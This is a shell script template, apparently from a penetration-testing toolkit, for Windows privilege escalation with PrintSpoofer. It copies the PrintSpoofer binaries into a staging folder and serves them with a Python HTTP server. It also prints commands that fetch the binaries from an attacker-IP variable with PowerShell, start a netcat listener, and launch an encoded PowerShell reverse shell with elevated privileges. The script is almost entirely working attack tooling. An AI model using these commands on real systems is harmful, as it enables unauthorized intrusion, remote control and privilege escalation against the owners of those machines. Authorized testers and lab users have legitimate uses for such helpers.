mkdir -p packstation/outbound; cp -n <%=$(esh variables/tools_dir)%>/printspoofer/* packstation/outbound/; \
echo '================================================================'; \
echo '                      -----PowerShell-----                      '; \
echo 'Deliver (x64): iwr -uri http://<%=$(esh variables/attacker_ip)%>:<%=$(esh variables/delivery_outbound_port)%>/PrintSpoofer64.exe -Outfile <%=$(esh variables/delivery_path_windows)%>\PrintSpoofer64.exe'; \
echo 'Deliver (x32): iwr -uri http://<%=$(esh variables/attacker_ip)%>:<%=$(esh variables/delivery_outbound_port)%>/PrintSpoofer32.exe -Outfile <%=$(esh variables/delivery_path_windows)%>\PrintSpoofer32.exe'; \
echo '================================================================'; \
echo '                      -Suggested Commands-                      '; \
echo 'To execute in-place: <%=$(esh variables/delivery_path_windows)%>\PrintSpoofer64.exe -i -c powershell.exe'; \
echo 'Preparation 1 (for revshell): nc -lvnp <%=$(esh variables/shell_port)%>'; \
echo 'To open another revshell with elevated privileges: <%=$(esh variables/delivery_path_windows)%>\PrintSpoofer64.exe -i -c "powershell -e <%=${payload:-$(esh payloads/revshell-windows-powershell-oneliner-base64encoded)}%>"'; \
echo '================================================================'; \
python -m http.server <%=$(esh variables/delivery_outbound_port)%> -d packstation/outbound
